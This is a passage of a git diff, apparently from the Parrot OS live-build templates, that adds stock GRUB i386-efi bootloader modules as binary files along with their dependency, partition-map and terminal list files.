zfs gcry_sha1 +signature_test: functional_test procfs +raid5rec: diskfilter +pcidump: extcmd +gcry_arcfour: crypto +part_dfly: +minix2_be: +gettext: +pbkdf2_test: pbkdf2 gcry_sha1 functional_test +hello: extcmd +usbserial_pl2303: usbserial_common usb serial +hashsum: extcmd crypto normal +xnu_uuid_test: functional_test +regexp: extcmd normal +part_gpt: +ohci: boot usb cs5536 +gptsync: disk +zfs: gzio +part_apple: +hdparm: extcmd +bufio: +btrfs: gzio lzopio +bitmap: +true: +terminfo: extcmd +romfs: fshelp +ntfscomp: ntfs +lsefi: +hfs: fshelp +gcry_dsa: mpi verify +cmdline_cat_test: video_fb functional_test procfs normal font +ufs1: +offsetio: +legacy_password_test: legacycfg functional_test +setjmp: +ufs2: +nilfs2: fshelp +lsmmap: mmap +gcry_sha1: crypto +mmap: +tar: archelp +png: bufio bitmap +lspci: extcmd +hfsplus: fshelp +cbls: cbtable +tga: bufio bitmap +random: hexdump +minix2: +setpci: extcmd +scsi: +pata: ata +minix3: +lvm: diskfilter +functional_test: video extcmd video_fb btrfs +eval: normal +iso9660: fshelp +crc64: crypto +udf: fshelp +search_label: +raid6rec: diskfilter +msdospart: parttool disk +archelp: +procfs: archelp +minix3_be: +halt: acpi +xnu: boot video extcmd bitmap_scale relocator bitmap mmap random macho +read: +multiboot: boot video net relocator mmap +keystatus: extcmd +cryptodisk: extcmd crypto procfs +shift_test: functional_test +normal: boot extcmd crypto terminal gettext bufio +lsefimmap: +loadbios: +geli: gcry_sha512 pbkdf2 crypto gcry_sha256 cryptodisk +spkmodem: terminfo +gcry_idea: crypto +bswap_test: functional_test +video_bochs: video video_fb +verify: extcmd crypto mpi gcry_sha1 +sfs: fshelp +part_amiga: +luks: pbkdf2 crypto cryptodisk +loopback: extcmd +jfs: +gfxterm_background: gfxterm video extcmd bitmap_scale video_colors bitmap +efifwsetup: reboot +usbserial_usbdebug: usbserial_common usb serial +part_acorn: +newc: archelp +macho: +iorw: extcmd +cat: extcmd +afs: fshelp +sleep_test: datetime functional_test +ldm: part_msdos part_gpt diskfilter +hexdump: extcmd +efinet: net +disk: +usbserial_ftdi: usbserial_common usb serial +minicmd: +loadenv: extcmd disk +gcry_whirlpool: crypto +fixvideo: +part_bsd: part_msdos +font: video bufio +ext2: fshelp +diskfilter: +videotest_checksum: video_fb functional_test font +file: extcmd elf offsetio macho +ntfs: fshelp +efi_uga: video video_fb +all_video: efi_gop efi_uga video_bochs video_cirrus diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/morse.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/morse.mod new file mode 100644 index 00000000..a44a6872 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/morse.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mpi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mpi.mod new file mode 100644 index 00000000..a97c9597 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mpi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/msdospart.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/msdospart.mod new file mode 100644 index 00000000..67c8fe9c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/msdospart.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mul_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mul_test.mod new file mode 100644 index 00000000..112ec8da Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mul_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/multiboot.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/multiboot.mod new file mode 100644 index 00000000..72f0d5bc Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/multiboot.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/multiboot2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/multiboot2.mod new file mode 100644 index 00000000..37b89b1a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/multiboot2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/nativedisk.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/nativedisk.mod new file mode 100644 index 00000000..39fd0f2b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/nativedisk.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/net.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/net.mod new file mode 100644 index 00000000..789ef1b0 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/net.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/newc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/newc.mod new file mode 100644 index 00000000..74872fef Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/newc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/normal.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/normal.mod new file mode 100644 index 00000000..147aca80 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/normal.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ntfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ntfs.mod new file mode 100644 index 00000000..efc89fac Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ntfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ntfscomp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ntfscomp.mod new file mode 100644 index 00000000..725cf4d7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ntfscomp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/odc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/odc.mod new file mode 100644 index 00000000..24aa624f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/odc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/offsetio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/offsetio.mod new file mode 100644 index 00000000..469219f8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/offsetio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ohci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ohci.mod new file mode 100644 index 00000000..2235396a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ohci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_acorn.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_acorn.mod new file mode 100644 index 00000000..24266a70 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_acorn.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_amiga.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_amiga.mod new file mode 100644 index 00000000..139fd09c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_amiga.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_apple.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_apple.mod new file mode 100644 index 00000000..b30fcc07 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_apple.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_bsd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_bsd.mod new file mode 100644 index 00000000..4b9665db Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_bsd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_dfly.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_dfly.mod new file mode 100644 index 00000000..7c36ed9b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_dfly.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_dvh.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_dvh.mod new file mode 100644 index 00000000..bccd4f5b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_dvh.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_gpt.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_gpt.mod new file mode 100644 index 00000000..db2d3de4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_gpt.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_msdos.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_msdos.mod new file mode 100644 index 00000000..e3ed41b1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_msdos.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_plan.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_plan.mod new file mode 100644 index 00000000..329f0e0e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_plan.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_sun.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_sun.mod new file mode 100644 index 00000000..c39d72cc Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_sun.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_sunpc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_sunpc.mod new file mode 100644 index 00000000..e011a4e3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/part_sunpc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/partmap.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/partmap.lst new file mode 100644 index 00000000..761233aa --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/partmap.lst @@ -0,0 +1,11 @@ +part_acorn +part_amiga +part_apple +part_bsd +part_dfly +part_dvh +part_gpt +part_msdos +part_plan +part_sun +part_sunpc diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/parttool.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/parttool.lst new file mode 100644 index 00000000..68b4b5c4 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/parttool.lst @@ -0,0 +1 @@ +msdos: msdospart diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/parttool.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/parttool.mod new file mode 100644 index 00000000..6ea76e2a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/parttool.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/password.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/password.mod new file mode 100644 index 00000000..cba377c5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/password.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/password_pbkdf2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/password_pbkdf2.mod new file mode 100644 index 00000000..174d74be Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/password_pbkdf2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pata.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pata.mod new file mode 100644 index 00000000..44af949e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pata.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pbkdf2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pbkdf2.mod new file mode 100644 index 00000000..73389128 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pbkdf2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pbkdf2_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pbkdf2_test.mod new file mode 100644 index 00000000..8be22c59 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pbkdf2_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pcidump.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pcidump.mod new file mode 100644 index 00000000..23ad5086 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/pcidump.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/play.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/play.mod new file mode 100644 index 00000000..c3783203 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/play.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/png.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/png.mod new file mode 100644 index 00000000..d5c9294d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/png.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/priority_queue.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/priority_queue.mod new file mode 100644 index 00000000..26777a34 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/priority_queue.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/probe.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/probe.mod new file mode 100644 index 00000000..754ca474 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/probe.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/procfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/procfs.mod new file mode 100644 index 00000000..1165f60d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/procfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/progress.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/progress.mod new file mode 100644 index 00000000..c17c5b54 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/progress.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/raid5rec.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/raid5rec.mod new file mode 100644 index 00000000..0d56b23b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/raid5rec.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/raid6rec.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/raid6rec.mod new file mode 100644 index 00000000..ca93f01b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/raid6rec.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/random.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/random.mod new file mode 100644 index 00000000..b48b0563 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/random.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/read.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/read.mod new file mode 100644 index 00000000..47d4c50f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/read.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/reboot.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/reboot.mod new file mode 100644 index 00000000..28ecf23b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/reboot.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/regexp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/regexp.mod new file mode 100644 index 00000000..23224c19 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/regexp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/reiserfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/reiserfs.mod new file mode 100644 index 00000000..10686cfe Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/reiserfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/relocator.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/relocator.mod new file mode 100644 index 00000000..60bbd01f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/relocator.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/romfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/romfs.mod new file mode 100644 index 00000000..203b4b16 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/romfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/scsi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/scsi.mod new file mode 100644 index 00000000..6518e44a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/scsi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/serial.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/serial.mod new file mode 100644 index 00000000..a53ab191 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/serial.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setjmp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setjmp.mod new file mode 100644 index 00000000..2d35023b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setjmp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setjmp_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setjmp_test.mod new file mode 100644 index 00000000..d33d6f46 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setjmp_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setpci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setpci.mod new file mode 100644 index 00000000..929e2cc9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/setpci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/shift_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/shift_test.mod new file mode 100644 index 00000000..12dda71b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/shift_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/signature_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/signature_test.mod new file mode 100644 index 00000000..4faf0d44 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/signature_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/sleep.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/sleep.mod new file mode 100644 index 00000000..1bf43c73 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/sleep.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/sleep_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/sleep_test.mod new file mode 100644 index 00000000..52eb7d19 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/sleep_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/spkmodem.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/spkmodem.mod new file mode 100644 index 00000000..ec4c9708 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/spkmodem.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/squash4.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/squash4.mod new file mode 100644 index 00000000..b94c8cad Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/squash4.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/syslinuxcfg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/syslinuxcfg.mod new file mode 100644 index 00000000..be2ba381 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/syslinuxcfg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminal.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminal.lst new file mode 100644 index 00000000..3c9a5a34 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminal.lst @@ -0,0 +1,9 @@ +iat_keyboard: at_keyboard +iserial: serial +iserial_*: serial +oaudio: morse +ocbmemc: cbmemc +ogfxterm: gfxterm +oserial: serial +oserial_*: serial +ospkmodem: spkmodem diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminal.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminal.mod new file mode 100644 index 00000000..d31937a2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminal.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminfo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminfo.mod new file mode 100644 index 00000000..85a4baa5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/terminfo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/test.mod new file mode 100644 index 00000000..fcdb6d08 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/test_blockarg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/test_blockarg.mod new file mode 100644 index 00000000..d22bac43 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/test_blockarg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/testload.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/testload.mod new file mode 100644 index 00000000..fc73ffe4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/testload.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/testspeed.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/testspeed.mod new file mode 100644 index 00000000..79bab708 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/testspeed.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tftp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tftp.mod new file mode 100644 index 00000000..4950fedf Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tftp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tga.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tga.mod new file mode 100644 index 00000000..f577ba8a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tga.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/time.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/time.mod new file mode 100644 index 00000000..215413df Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/time.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tr.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tr.mod new file mode 100644 index 00000000..1567d69f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/tr.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/trig.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/trig.mod new file mode 100644 index 00000000..b58e3458 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/trig.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/true.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/true.mod new file mode 100644 index 00000000..66c42b09 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/true.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/udf.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/udf.mod new file mode 100644 index 00000000..03d2696c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/udf.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs1.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs1.mod new file mode 100644 index 00000000..a4ec899d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs1.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs1_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs1_be.mod new file mode 100644 index 00000000..8426beea Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs1_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs2.mod new file mode 100644 index 00000000..70e356ab Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ufs2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/uhci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/uhci.mod new file mode 100644 index 00000000..88482e30 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/uhci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usb.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usb.mod new file mode 100644 index 00000000..79b8289a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usb.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usb_keyboard.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usb_keyboard.mod new file mode 100644 index 00000000..1e497a98 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usb_keyboard.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbms.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbms.mod new file mode 100644 index 00000000..5b959130 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbms.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_common.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_common.mod new file mode 100644 index 00000000..8de863de Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_common.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_ftdi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_ftdi.mod new file mode 100644 index 00000000..73ff0e04 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_ftdi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_pl2303.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/usbserial_pl2303.mod new file mode 100644 index 